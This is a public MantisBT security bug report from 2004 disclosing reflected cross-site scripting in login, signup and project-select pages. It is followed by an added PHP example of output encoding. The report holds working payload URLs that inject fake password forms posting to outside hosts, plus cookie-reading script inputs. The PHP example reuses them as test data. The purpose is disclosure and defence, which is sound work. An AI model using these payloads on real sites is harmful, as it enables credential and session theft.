View Issue Details

ID: 0004061
Project: mantisbt
Category: security
View Status: public
Last Update: 2006-10-09 11:55
Reporter: joxeanpiti
Assigned To: vboctor
Priority: normal
Severity: major
Reproducibility: always
Status: closed
Resolution: duplicate
Product Version: 0.19.0a1
Summary: 0004061: Multiple Cross Site Scripting Vulnerabilities
Description

I found multiple XSS vulnerabilities. The problems are always the same: incorrect sanitization of the passed parameters.

In the "Additional Information" field I put 3 proofs of concept to test these possible attacks.

Additional Information

Multiple Cross Site Scripting Vulnerabilities


1.- (RE-)LOGIN XSS VULNERABILITY

-The first vulnerability that I found is this: you can log in anonymously and, when you want to perform a privileged
action, you need to re-login with any valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when showing/parsing and we can put any html/script code
that we want. To try the first vulnerability, copy the following text and paste it in the location bar of your favourite web
browser:

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E


2.- REGISTER NEW USER XSS VULNERABILITY

-The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). This script registers
a new user. The problem is that the script doesn't sanitize properly the passed e-mail when showing/parsing. Now we have
the second XSS problem that I found. To test it, please follow these steps:

- Navigate to http://bugs.mantisbt.org/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text:

    <h1>hi</h1><br><br><br><br><br><br><br><br><br><br><br><br>

- The page will show the simple "hi" message, but we can create a simple web-form or insert any malicious script.

3.- SELECT PROJECT XSS VULNERABILITY

-I will not explain the problem because it is the same every time. Try the following URL please:

http://bugs.mantisbt.org/login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E

Tags: No tags attached.

Relationships

duplicate of 0004062 (closed, vboctor): Multiple Cross Site Scripting Vulnerabilities
child of 0003987 (closed, vboctor): Mantis 0.19.0 Release

Activities

joxeanpiti (reporter)

2004-07-18 13:43

~0006123

Last edited: 2004-07-18 13:52

1.- Register New User XSS Vulnerability is not corrected. Try it :

- Navigate to http://bugs.mantisbt.org/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text:

<script>document.write('Cookie is : ' + document.cookie)</script>

2.- Select Project XSS Vulnerability is not fixed. Try the following URL:

http://bugs.mantisbt.org/login_select_proj_page.php?ref=%22><script>alert(document.cookie)</script>

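All three findings in the report, and both retest payloads in the follow-up note, are the same bug: request data (the return/ref URL, the signup e-mail) is written into HTML without being encoded for the context it lands in. The `">` prefix in the reporter's payloads closes a quoted attribute and its tag, so anything after it is parsed as new markup. The following is an added example written for this page; it is not MantisBT code and not the fix that shipped. The function names, the hidden-field and paragraph contexts, and the sample payloads are assumptions made for illustration.

```php
<?php
// Added example (not MantisBT code). Shows the reflected-input bug from the
// report in a hidden form field and in page text, beside the output encoding
// that stops it. All function names here are hypothetical.

// Vulnerable: raw request data concatenated into HTML. A value such as
//   "><h1>Hello!</h1><form action="http://malicious.site.com/script.xxx">
// closes value="...", closes the <input>, and the rest becomes live markup.
function render_login_form_vulnerable(string $return): string {
    return '<form method="post" action="login.php">'
         . '<input type="hidden" name="return" value="' . $return . '">'
         . '</form>';
}

// Hardened: encode at the output point, for the context being written to.
// ENT_QUOTES encodes both " and ', so the value cannot escape either attribute
// quoting style; ENT_SUBSTITUTE and the explicit charset keep invalid byte
// sequences from making the encoder return an empty string.
function html_escape(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_login_form_safe(string $return): string {
    return '<form method="post" action="login.php">'
         . '<input type="hidden" name="return" value="' . html_escape($return) . '">'
         . '</form>';
}

// Same rule for text content (the signup.php e-mail case): the <script> tag
// survives only as literal text, not as markup.
function render_signup_result_safe(string $email): string {
    return '<p>Registration request sent to ' . html_escape($email) . '</p>';
}

// Caveat for return/ref values that are also used as a redirect or link
// target: HTML-encoding does not make a URL safe to navigate to. Accept only
// a plain relative path on this site (no scheme, no leading slash or dot,
// no quotes or angle brackets) and fall back to a fixed page otherwise.
function safe_local_ref(string $ref, string $default = 'main_page.php'): string {
    return preg_match('#^[A-Za-z0-9_][A-Za-z0-9_./?=&-]*$#', $ref) === 1 ? $ref : $default;
}

// Self-check using the report's payloads (constructed sample input).
// Returns true when every hardened output contains no markup from the payload.
function self_check(): bool {
    $return_payload = '"><h1>Hello!</h1><form action="http://malicious.site.com/script.xxx">';
    $email_payload  = "<script>document.write('Cookie is : ' + document.cookie)</script>";
    $ref_payload    = '"><script>alert(document.cookie)</script>';

    $vuln = render_login_form_vulnerable($return_payload);
    $safe = render_login_form_safe($return_payload);
    $mail = render_signup_result_safe($email_payload);

    return strpos($vuln, '<h1>') !== false          // payload is live markup
        && strpos($safe, '<h1>') === false          // payload is inert text
        && strpos($safe, '&quot;&gt;&lt;h1&gt;') !== false
        && strpos($mail, '<script>') === false
        && safe_local_ref($ref_payload) === 'main_page.php'
        && safe_local_ref('view_all_bug_page.php?page_number=2') === 'view_all_bug_page.php?page_number=2';
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "all hardened outputs are inert\n" : "CHECK FAILED\n";
}
```

Run it with `php xss_demo.php`. The point to carry over to a real fix is that the encoding belongs at the output statement, chosen by the destination context (attribute value, text node, URL), not in a one-off filter on the way in; a value that is safe as text is still unsafe as an `href`, which is why the ref/return case also needs the allow-list.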